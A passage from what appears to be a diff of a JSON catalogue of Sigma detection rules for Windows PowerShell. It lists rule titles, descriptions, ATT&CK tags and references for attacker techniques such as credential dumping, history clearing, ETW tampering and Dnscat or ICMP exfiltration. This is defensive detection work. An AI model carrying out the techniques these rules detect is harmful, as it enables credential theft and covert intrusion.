post-compromise operations\n", - "uuid": "d4a11f63-2390-411c-9adf-d791fd152830", - "value": "Windows Screen Capture with CopyFromScreen", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-6---windows-screen-capture-copyfromscreen", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_capture_screenshots.yml" - ], - "tags": [ - "attack.collection", - "attack.t1113" - ], - "creation_date": "2021/12/28", - "filename": "posh_ps_capture_screenshots.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", - "uuid": "bde47d4b-9987-405c-94c7-b080410e8ea7", - "value": "Clearing Windows Console History", - "meta": { - "refs": [ - "https://stefanos.cloud/blog/kb/how-to-clear-the-powershell-command-history/", - "https://www.shellhacks.com/clear-history-powershell/", - "https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_clearing_windows_console_history.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1070.003" - ], - "creation_date": "2021/11/25", - "filename": "posh_ps_clearing_windows_console_history.yml", - "author": "Austin Songer @austinsonger", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects keywords that could indicate clearing PowerShell history", - "uuid": "26b692dc-1722-49b2-b496-a8258aa6371d", - "value": "Clear PowerShell History - PowerShell", - "meta": { - "refs": [ - "https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_clear_powershell_history.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.003" - ], - "creation_date": "2022/01/25", - "filename": "posh_ps_clear_powershell_history.yml", - "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", - "uuid": "4cd29327-685a-460e-9dac-c3ab96e549dc", - "value": "Execution via CL_Invocation.ps1 - Powershell", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", - "https://twitter.com/bohops/status/948061991012327424", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ], - "creation_date": "2020/10/14", - "filename": "posh_ps_cl_invocation_lolscript.yml", - "author": "oscd.community, Natalia Shornikova", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", - "uuid": "f588e69b-0750-46bb-8f87-0e9320d57536", - "value": "Execution via CL_Invocation.ps1 (2 Lines)", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", - "https://twitter.com/bohops/status/948061991012327424", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript_count.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ], - "creation_date": "2020/10/14", - "filename": "posh_ps_cl_invocation_lolscript_count.yml", - "author": "oscd.community, Natalia Shornikova", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", - "uuid": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", - "value": "Execution via CL_Mutexverifiers.ps1", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/", - "https://twitter.com/pabraeken/status/995111125447577600", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_mutexverifiers_lolscript.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ], - "creation_date": "2020/10/14", - "filename": "posh_ps_cl_mutexverifiers_lolscript.yml", - "author": "oscd.community, Natalia Shornikova", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", - "uuid": "6609c444-9670-4eab-9636-fe4755a851ce", - "value": "Execution via CL_Mutexverifiers.ps1 (2 Lines)", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/", - "https://twitter.com/pabraeken/status/995111125447577600", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_mutexverifiers_lolscript_count.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ], - "creation_date": "2020/10/14", - "filename": "posh_ps_cl_mutexverifiers_lolscript_count.yml", - "author": "oscd.community, Natalia Shornikova", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code", - "uuid": "363eccc0-279a-4ccf-a3ab-24c2e63b11fb", - "value": "Powershell Create Scheduled Task", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-4---powershell-cmdlet-scheduled-task", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-6---wmi-invoke-cimmethod-scheduled-task", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cmdlet_scheduled_task.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1053.005" - ], - "creation_date": "2021/12/28", - "filename": "posh_ps_cmdlet_scheduled_task.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", - "uuid": "db885529-903f-4c5d-9864-28fe199e6370", - "value": "Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell", - "meta": { - "refs": [ - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", - "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", - "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033" - ], - "creation_date": "2022/11/17", - "filename": "posh_ps_computer_discovery_get_adcomputer.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Uses PowerShell to install/copy a a file into a system directory such as \"System32\" or \"SysWOW64\"", - "uuid": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", - "value": "Powershell Install a DLL in System Directory", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1556.002/T1556.002.md#atomic-test-1---install-and-register-password-filter-dll", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_copy_item_system_directory.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1556.002" - ], - "creation_date": "2021/12/27", - "filename": "posh_ps_copy_item_system_directory.yml", - "author": "frack113, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR.\nThe COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR).\nThese profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.\n(Citation: Microsoft Profiling Mar 2017)\n(Citation: Microsoft COR_PROFILER Feb 2013)\n", - "uuid": "23590215-4702-4a70-8805-8dc9e58314a2", - "value": "Registry-Free Process Scope COR_PROFILER", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.012/T1574.012.md#atomic-test-3---registry-free-process-scope-cor_profiler", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cor_profiler.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1574.012" - ], - "creation_date": "2021/12/30", - "filename": "posh_ps_cor_profiler.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate administrative script" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects creation of a local user via PowerShell", - "uuid": "243de76f-4725-4f2e-8225-a8a69b15ad61", - "value": "PowerShell Create Local User", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_create_local_user.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.persistence", - "attack.t1136.001" - ], - "creation_date": "2020/04/11", - "filename": "posh_ps_create_local_user.yml", - "author": "@ROxPinTeddy", - "level": "medium", - "falsepositive": [ - "Legitimate user creation" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", - "uuid": "afd12fed-b0ec-45c9-a13d-aa86625dac81", - "value": "Create Volume Shadow Copy with Powershell", - "meta": { - "refs": [ - "https://attack.mitre.org/datasources/DS0005/", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_create_volume_shadow_copy.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.003" - ], - "creation_date": "2022/01/12", - "filename": "posh_ps_create_volume_shadow_copy.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", - "uuid": "6dc5d284-69ea-42cf-9311-fb1c3932a69a", - "value": "Data Compressed - PowerShell", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560/T1560.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_data_compressed.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1560" - ], - "creation_date": "2019/10/21", - "filename": "posh_ps_data_compressed.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "low", - "falsepositive": [ - "Highly likely if archive operations are done via PowerShell." - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.\nThis may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox\n", - "uuid": "d93129cd-1ee0-479f-bc03-ca6f129882e3", - "value": "Powershell Detect Virtualization Environment", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1497.001/T1497.001.md", - "https://techgenix.com/malicious-powershell-scripts-evade-detection/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_detect_vm_env.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1497.001" - ], - "creation_date": "2021/08/03", - "filename": "posh_ps_detect_vm_env.yml", - "author": "frack113, Duc.Le-GTSC", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Enumerates Active Directory to determine computers that are joined to the domain", - "uuid": "1f6399cf-2c80-4924-ace1-6fcff3393480", - "value": "DirectorySearcher Powershell Exploitation", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-15---enumerate-domain-computers-within-active-directory-using-directorysearcher", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_directorysearcher.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1018" - ], - "creation_date": "2022/02/12", - "filename": "posh_ps_directorysearcher.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may create a domain account to maintain access to victim systems.\nDomain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain..\n", - "uuid": "b29a93fb-087c-4b5b-a84d-ee3309e69d08", - "value": "Manipulation of User Computer or Group Security Principals Across AD", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.002/T1136.002.md#atomic-test-3---create-a-new-domain-account-using-powershell", - "https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.accountmanagement?view=dotnet-plat-ext-6.0", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1136.002" - ], - "creation_date": "2021/12/28", - "filename": "posh_ps_directoryservices_accountmanagement.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate administrative script" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module", - "uuid": "602f5669-6927-4688-84db-0d4b7afb2150", - "value": "Disable Powershell Command History", - "meta": { - "refs": [ - "https://twitter.com/DissectMalware/status/1062879286749773824", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_disable_psreadline_command_history.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.003" - ], - "creation_date": "2022/08/21", - "filename": "posh_ps_disable_psreadline_command_history.yml", - "author": "Ali Alwashali", - "level": "high", - "falsepositive": [ - "Legitimate script that disables the command history" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", - "uuid": "99c4658d-2c5e-4d87-828d-7c066ca537c3", - "value": "Disable-WindowsOptionalFeature Command PowerShell", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md", - "https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/09/10", - "filename": "posh_ps_disable_windowsoptionalfeature.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Dnscat exfiltration tool execution", - "uuid": "a6d67db4-6220-436d-8afc-f3842fe05d43", - "value": "Dnscat Execution", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_dnscat_execution.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/10/24", - "filename": "posh_ps_dnscat_execution.yml", - "author": "Daniil Yugoslavskiy, oscd.community", - "level": "critical", - "falsepositive": [ - "Legitimate usage of PowerShell Dnscat2 \u2014 DNS Exfiltration tool (unlikely)" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", - "uuid": "99c49d9c-34ea-45f7-84a7-4751ae6b2cbc", - "value": "Dump Credentials from Windows Credential Manager With PowerShell", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_dump_password_windows_credential_manager.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1555" - ], - "creation_date": "2021/12/20", - "filename": "posh_ps_dump_password_windows_credential_manager.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", - "uuid": "991a9744-f2f0-44f2-bd33-9092eba17dc3", - "value": "Enable Windows Remote Management", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_psremoting.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.006" - ], - "creation_date": "2022/01/07", - "filename": "posh_ps_enable_psremoting.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate script" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detect built in PowerShell cmdlet Enable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", - "uuid": "55c925c1-7195-426b-a136-a9396800e29b", - "value": "Enable-WindowsOptionalFeature Command PowerShell", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_windowsoptionalfeature.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/09/10", - "filename": "posh_ps_enable_windowsoptionalfeature.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", - "uuid": "603c6630-5225-49c1-8047-26c964553e0e", - "value": "Enumerate Credentials from Windows Credential Manager With PowerShell", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enumerate_password_windows_credential_manager.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1555" - ], - "creation_date": "2021/12/20", - "filename": "posh_ps_enumerate_password_windows_credential_manager.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", - "uuid": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", - "value": "Disable of ETW Trace - Powershell", - "meta": { - "refs": [ - "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_etw_trace_evasion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1562.006", - "car.2016-04-002" - ], - "creation_date": "2022/06/28", - "filename": "posh_ps_etw_trace_evasion.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP forwarding rule.", - "uuid": "15b7abbb-8b40-4d01-9ee2-b51994b1d474", - "value": "Suspicious PowerShell Mailbox SMTP Forward Rule", - "meta": { - "refs": [ - "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_exchange_mailbox_smpt_forwarding_rule.yml" - ], - "tags": [ - "attack.exfiltration" - ], - "creation_date": "2022/10/26", - "filename": "posh_ps_exchange_mailbox_smpt_forwarding_rule.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate usage of the cmdlet to forward emails" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.\nAdversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors,\nincluding whether or not the adversary fully infects the target and/or attempts specific actions.\n", - "uuid": "d23f2ba5-9da0-4463-8908-8ee47f614bb9", - "value": "Powershell File and Directory Discovery", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_file_and_directory_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1083" - ], - "creation_date": "2021/12/15", - "filename": "posh_ps_file_and_directory_discovery.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", - "uuid": "95afc12e-3cbb-40c3-9340-84a032e596a3", - "value": "Service Registry Permissions Weakness Check", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_acl_service.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1574.011" - ], - "creation_date": "2021/12/30", - "filename": "posh_ps_get_acl_service.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate administrative script" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the \"Get-AdComputer\" to enumerate Computers within Active Directory.", - "uuid": "36bed6b2-e9a0-4fff-beeb-413a92b86138", - "value": "Active Directory Computers Enumeration with Get-AdComputer", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adcomputer.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1018" - ], - "creation_date": "2022/03/17", - "filename": "posh_ps_get_adcomputer.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the \"Get-AdGroup\" cmdlet to enumerate Groups within Active Directory", - "uuid": "8c3a6607-b7dc-4f0d-a646-ef38c00b76ee", - "value": "Active Directory Group Enumeration With Get-AdGroup", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adgroup.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1069.002" - ], - "creation_date": "2022/03/17", - "filename": "posh_ps_get_adgroup.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory.\nThese include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.\n", - "uuid": "060c3ef1-fd0a-4091-bf46-e7d625f60b73", - "value": "Suspicious Get-ADReplAccount", - "meta": { - "refs": [ - "https://www.powershellgallery.com/packages/DSInternals", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.006/T1003.006.md#atomic-test-2---run-dsinternals-get-adreplaccount", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adreplaccount.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.006" - ], - "creation_date": "2022/02/06", - "filename": "posh_ps_get_adreplaccount.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.\n", - "uuid": "e0565f5d-d420-4e02-8a68-ac00d864f9cf", - "value": "Automated Collection Bookmarks Using Get-ChildItem PowerShell", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_childitem_bookmarks.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1217" - ], - "creation_date": "2021/12/13", - "filename": "posh_ps_get_childitem_bookmarks.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects call to \"Win32_QuickFixEngineering\" in order to enumerate installed hotfixes often used in \"enum\" scripts by attackers", - "uuid": "f5d1def8-1de0-4a0e-9794-1f6f27dd605c", - "value": "PowerShell Hotfix Enumeration", - "meta": { - "refs": [ - "https://github.com/411Hall/JAWS/blob/233f142fcb1488172aa74228a666f6b3c5c48f1d/jaws-enum.ps1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_hotfix_enum.yml" - ], - "tags": [ - "attack.discovery" - ], - "creation_date": "2022/06/21", - "filename": "posh_ps_hotfix_enum.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate administration scripts" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.", - "uuid": "4c4af3cd-2115-479c-8193-6b8bfce9001c", - "value": "PowerShell ICMP Exfiltration", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-2---exfiltration-over-alternative-protocol---icmp", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_icmp_exfiltration.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003" - ], - "creation_date": "2020/10/10", - "filename": "posh_ps_icmp_exfiltration.yml", - "author": "Bartlomiej Czyz @bczyz1, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate usage of System.Net.NetworkInformation.Ping class" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects powershell scripts that import modules from suspicious directories", - "uuid": "21f9162c-5f5d-4b01-89a8-b705bd7d10ab", - "value": "Import PowerShell Modules From Suspicious Directories", - "meta": { - "refs": [ - 